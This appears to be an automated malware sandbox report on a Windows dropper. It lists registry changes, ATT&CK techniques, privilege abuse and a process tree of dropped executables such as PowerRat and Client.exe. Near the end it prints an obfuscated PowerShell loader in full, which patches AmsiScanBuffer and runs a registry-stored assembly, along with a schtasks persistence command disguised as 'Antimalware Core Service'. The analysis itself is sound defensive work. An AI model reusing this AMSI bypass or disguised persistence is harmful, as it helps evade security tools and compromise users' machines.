Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
2032	PING.EXE
1452	PING.EXE
196	PING.EXE
2548	PING.EXE
3268	PING.EXE
1820	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3924	schtasks.exe
5096	schtasks.exe
2796	schtasks.exe
1460	schtasks.exe
3068	schtasks.exe
4692	schtasks.exe
1128	schtasks.exe
5036	schtasks.exe
2548	schtasks.exe
4700	schtasks.exe
872	schtasks.exe
2680	schtasks.exe
3500	schtasks.exe
500	schtasks.exe
1176	schtasks.exe
3528	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1228	cabal.exe
4060	update.exe
4060	update.exe
4060	update.exe
4060	update.exe
4060	update.exe
5016	Loader.exe
5016	Loader.exe
324	dialer.exe
324	dialer.exe
324	dialer.exe
324	dialer.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
3328	Solara_Protect.exe
716	vanilla.exe
880	wudi.exe
880	wudi.exe
2836	powershell.EXE
2836	powershell.EXE
2836	powershell.EXE
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe
3260	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3328	mos%20ssssttttt.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1908	4363463463464363463463463.exe
Token: SeDebugPrivilege	4508	installer.exe
Token: SeDebugPrivilege	2196	Client.exe
Token: SeDebugPrivilege	1228	cabal.exe
Token: SeDebugPrivilege	4060	update.exe
Token: SeDebugPrivilege	3328	Solara_Protect.exe
Token: SeDebugPrivilege	2016	Windows.exe
Token: SeDebugPrivilege	1476	discord.exe
Token: SeDebugPrivilege	3604	main-pc.exe
Token: SeDebugPrivilege	716	vanilla.exe
Token: SeDebugPrivilege	4904	test.exe
Token: SeDebugPrivilege	4776	Client.exe
Token: SeDebugPrivilege	1880	test.exe
Token: SeDebugPrivilege	3840	test.exe
Token: SeDebugPrivilege	5112	$77Security.exe
Token: SeDebugPrivilege	2836	powershell.EXE
Token: SeDebugPrivilege	2836	powershell.EXE
Token: SeDebugPrivilege	3260	dllhost.exe
Token: SeShutdownPrivilege	552	dwm.exe
Token: SeCreatePagefilePrivilege	552	dwm.exe
Token: SeShutdownPrivilege	3288	Explorer.EXE
Token: SeCreatePagefilePrivilege	3288	Explorer.EXE
Token: SeAuditPrivilege	2644	svchost.exe
Token: SeAuditPrivilege	2292	svchost.exe
Token: SeAuditPrivilege	2644	svchost.exe
Token: SeDebugPrivilege	812	executablelol.exe
Token: SeShutdownPrivilege	3288	Explorer.EXE
Token: SeCreatePagefilePrivilege	3288	Explorer.EXE
Token: SeShutdownPrivilege	3288	Explorer.EXE
Token: SeCreatePagefilePrivilege	3288	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2628	svchost.exe
Token: SeIncreaseQuotaPrivilege	2628	svchost.exe
Token: SeSecurityPrivilege	2628	svchost.exe
Token: SeTakeOwnershipPrivilege	2628	svchost.exe
Token: SeLoadDriverPrivilege	2628	svchost.exe
Token: SeSystemtimePrivilege	2628	svchost.exe
Token: SeBackupPrivilege	2628	svchost.exe
Token: SeRestorePrivilege	2628	svchost.exe
Token: SeShutdownPrivilege	2628	svchost.exe
Token: SeSystemEnvironmentPrivilege	2628	svchost.exe
Token: SeUndockPrivilege	2628	svchost.exe
Token: SeManageVolumePrivilege	2628	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2628	svchost.exe
Token: SeIncreaseQuotaPrivilege	2628	svchost.exe
Token: SeSecurityPrivilege	2628	svchost.exe
Token: SeTakeOwnershipPrivilege	2628	svchost.exe
Token: SeLoadDriverPrivilege	2628	svchost.exe
Token: SeSystemtimePrivilege	2628	svchost.exe
Token: SeBackupPrivilege	2628	svchost.exe
Token: SeRestorePrivilege	2628	svchost.exe
Token: SeShutdownPrivilege	2628	svchost.exe
Token: SeSystemEnvironmentPrivilege	2628	svchost.exe
Token: SeUndockPrivilege	2628	svchost.exe
Token: SeManageVolumePrivilege	2628	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2628	svchost.exe
Token: SeIncreaseQuotaPrivilege	2628	svchost.exe
Token: SeSecurityPrivilege	2628	svchost.exe
Token: SeTakeOwnershipPrivilege	2628	svchost.exe
Token: SeLoadDriverPrivilege	2628	svchost.exe
Token: SeSystemtimePrivilege	2628	svchost.exe
Token: SeBackupPrivilege	2628	svchost.exe
Token: SeRestorePrivilege	2628	svchost.exe
Token: SeShutdownPrivilege	2628	svchost.exe
Token: SeSystemEnvironmentPrivilege	2628	svchost.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2196	Client.exe
2080	AnyDesk.exe
2080	AnyDesk.exe
2080	AnyDesk.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
2196	Client.exe
2080	AnyDesk.exe
2080	AnyDesk.exe
2080	AnyDesk.exe

Suspicious use of SetWindowsHookEx 32 IoCs

pid	Process
2196	Client.exe
4060	update.exe
4060	update.exe
1516	ktyhpldea.exe
3604	main-pc.exe
4904	test.exe
4776	Client.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
880	wudi.exe
4748	PaoNan.exe
4748	PaoNan.exe
4748	PaoNan.exe
1880	test.exe
4748	PaoNan.exe
3840	test.exe
3340	test.exe
3304	test.exe
4496	test.exe
1948	test.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1908 wrote to memory of 3048	1908	4363463463464363463463463.exe	78
PID 1908 wrote to memory of 3048	1908	4363463463464363463463463.exe	78
PID 1908 wrote to memory of 3048	1908	4363463463464363463463463.exe	78
PID 1908 wrote to memory of 2428	1908	4363463463464363463463463.exe	79
PID 1908 wrote to memory of 2428	1908	4363463463464363463463463.exe	79
PID 1908 wrote to memory of 2428	1908	4363463463464363463463463.exe	79
PID 1908 wrote to memory of 4508	1908	4363463463464363463463463.exe	80
PID 1908 wrote to memory of 4508	1908	4363463463464363463463463.exe	80
PID 4508 wrote to memory of 1460	4508	installer.exe	81
PID 4508 wrote to memory of 1460	4508	installer.exe	81
PID 4508 wrote to memory of 2196	4508	installer.exe	83
PID 4508 wrote to memory of 2196	4508	installer.exe	83
PID 2196 wrote to memory of 2680	2196	Client.exe	84
PID 2196 wrote to memory of 2680	2196	Client.exe	84
PID 1908 wrote to memory of 1228	1908	4363463463464363463463463.exe	86
PID 1908 wrote to memory of 1228	1908	4363463463464363463463463.exe	86
PID 1908 wrote to memory of 1228	1908	4363463463464363463463463.exe	86
PID 1228 wrote to memory of 4060	1228	cabal.exe	87
PID 1228 wrote to memory of 4060	1228	cabal.exe	87
PID 1228 wrote to memory of 4060	1228	cabal.exe	87
PID 1908 wrote to memory of 5016	1908	4363463463464363463463463.exe	88
PID 1908 wrote to memory of 5016	1908	4363463463464363463463463.exe	88
PID 1908 wrote to memory of 5016	1908	4363463463464363463463463.exe	88
PID 1908 wrote to memory of 3328	1908	4363463463464363463463463.exe	89
PID 1908 wrote to memory of 3328	1908	4363463463464363463463463.exe	89
PID 1908 wrote to memory of 3328	1908	4363463463464363463463463.exe	89
PID 5016 wrote to memory of 324	5016	Loader.exe	90
PID 5016 wrote to memory of 324	5016	Loader.exe	90
PID 5016 wrote to memory of 324	5016	Loader.exe	90
PID 5016 wrote to memory of 324	5016	Loader.exe	90
PID 5016 wrote to memory of 324	5016	Loader.exe	90
PID 3328 wrote to memory of 4768	3328	Solara_Protect.exe	91
PID 3328 wrote to memory of 4768	3328	Solara_Protect.exe	91
PID 3328 wrote to memory of 4768	3328	Solara_Protect.exe	91
PID 3328 wrote to memory of 1404	3328	Solara_Protect.exe	92
PID 3328 wrote to memory of 1404	3328	Solara_Protect.exe	92
PID 3328 wrote to memory of 1404	3328	Solara_Protect.exe	92
PID 1404 wrote to memory of 2456	1404	cmd.exe	95
PID 1404 wrote to memory of 2456	1404	cmd.exe	95
PID 1404 wrote to memory of 2456	1404	cmd.exe	95
PID 4768 wrote to memory of 3500	4768	cmd.exe	96
PID 4768 wrote to memory of 3500	4768	cmd.exe	96
PID 4768 wrote to memory of 3500	4768	cmd.exe	96
PID 1404 wrote to memory of 2016	1404	cmd.exe	97
PID 1404 wrote to memory of 2016	1404	cmd.exe	97
PID 1404 wrote to memory of 2016	1404	cmd.exe	97
PID 1908 wrote to memory of 1516	1908	4363463463464363463463463.exe	98
PID 1908 wrote to memory of 1516	1908	4363463463464363463463463.exe	98
PID 1908 wrote to memory of 1516	1908	4363463463464363463463463.exe	98
PID 1908 wrote to memory of 1476	1908	4363463463464363463463463.exe	99
PID 1908 wrote to memory of 1476	1908	4363463463464363463463463.exe	99
PID 1476 wrote to memory of 3068	1476	discord.exe	100
PID 1476 wrote to memory of 3068	1476	discord.exe	100
PID 1476 wrote to memory of 3604	1476	discord.exe	102
PID 1476 wrote to memory of 3604	1476	discord.exe	102
PID 3604 wrote to memory of 3924	3604	main-pc.exe	103
PID 3604 wrote to memory of 3924	3604	main-pc.exe	103
PID 1908 wrote to memory of 716	1908	4363463463464363463463463.exe	105
PID 1908 wrote to memory of 716	1908	4363463463464363463463463.exe	105
PID 1908 wrote to memory of 4904	1908	4363463463464363463463463.exe	106
PID 1908 wrote to memory of 4904	1908	4363463463464363463463463.exe	106
PID 4904 wrote to memory of 4692	4904	test.exe	107
PID 4904 wrote to memory of 4692	4904	test.exe	107
PID 716 wrote to memory of 5036	716	vanilla.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:644
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:552
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{65166bd0-6a24-44de-938d-7b7e194d108f}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3260

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gxlTwvkfcHcC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iFiBwxpMoICSeJ,[Parameter(Position=1)][Type]$BfszjzvIFk)$IJCvBlVfIZm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+'l'+''+'e'+''+'g'+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+'y'+'M'+''+'o'+''+'d'+'ule',$False).DefineType(''+'M'+''+'y'+'De'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e'+'T'+'y'+'p'+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+'ub'+'l'+''+'i'+''+[Char](99)+''+','+''+'S'+'ea'+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'Ansi'+'C'+'la'+'s'+''+'s'+''+','+''+[Char](65)+''+'u'+'t'+[Char](111)+'Cl'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$IJCvBlVfIZm.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$iFiBwxpMoICSeJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$IJCvBlVfIZm.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+'H'+''+[Char](105)+'de'+'B'+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$BfszjzvIFk,$iFiBwxpMoICSeJ).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+'e'+[Char](100)+'');Write-Output $IJCvBlVfIZm.CreateType();}$ZaVbrekVdizAy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+'e'+[Char](109)+'.dll')}).GetType('M'+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+'3'+''+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+'s'+'');$RGkIBPqyLzjMop=$ZaVbrekVdizAy.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fsmitCmZwaNGOAaykzm=gxlTwvkfcHcC @([String])([IntPtr]);$VqxIoozXskPzzAbxIkAypN=gxlTwvkfcHcC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wVWxGkOPtXq=$ZaVbrekVdizAy.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+'3'+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$XTdDuFPqCtWNqp=$RGkIBPqyLzjMop.Invoke($Null,@([Object]$wVWxGkOPtXq,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+'y'+[Char](65)+'')));$nlcPNdrjIPQwTidTY=$RGkIBPqyLzjMop.Invoke($Null,@([Object]$wVWxGkOPtXq,[Object](''+[Char](86)+'i'+'r'+'tu'+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$cPpbyiU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XTdDuFPqCtWNqp,$fsmitCmZwaNGOAaykzm).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'');$wrDuRXsEkBJRGVArc=$RGkIBPqyLzjMop.Invoke($Null,@([Object]$cPpbyiU,[Object](''+'A'+'m'+'s'+''+[Char](105)+'Sc'+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+'r'+'')));$oRVawFoGaW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nlcPNdrjIPQwTidTY,$VqxIoozXskPzzAbxIkAypN).Invoke($wrDuRXsEkBJRGVArc,[uint32]8,4,[ref]$oRVawFoGaW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wrDuRXsEkBJRGVArc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nlcPNdrjIPQwTidTY,$VqxIoozXskPzzAbxIkAypN).Invoke($wrDuRXsEkBJRGVArc,[uint32]8,0x20,[ref]$oRVawFoGaW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'WA'+'R'+'E').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+'s'+''+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  PID:5016
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  PID:3304
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  PID:2548
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  PID:2028
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  PID:3380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1432
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3040
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\System32\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1824

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1920

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2540

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:568

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:820

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3288
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3140
- - C:\Users\Admin\AppData\Local\Temp\Files\PowerRat.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PowerRat.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:3048
- - C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2428
- - C:\Users\Admin\AppData\Local\Temp\Files\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Antimalware Core Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1460
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
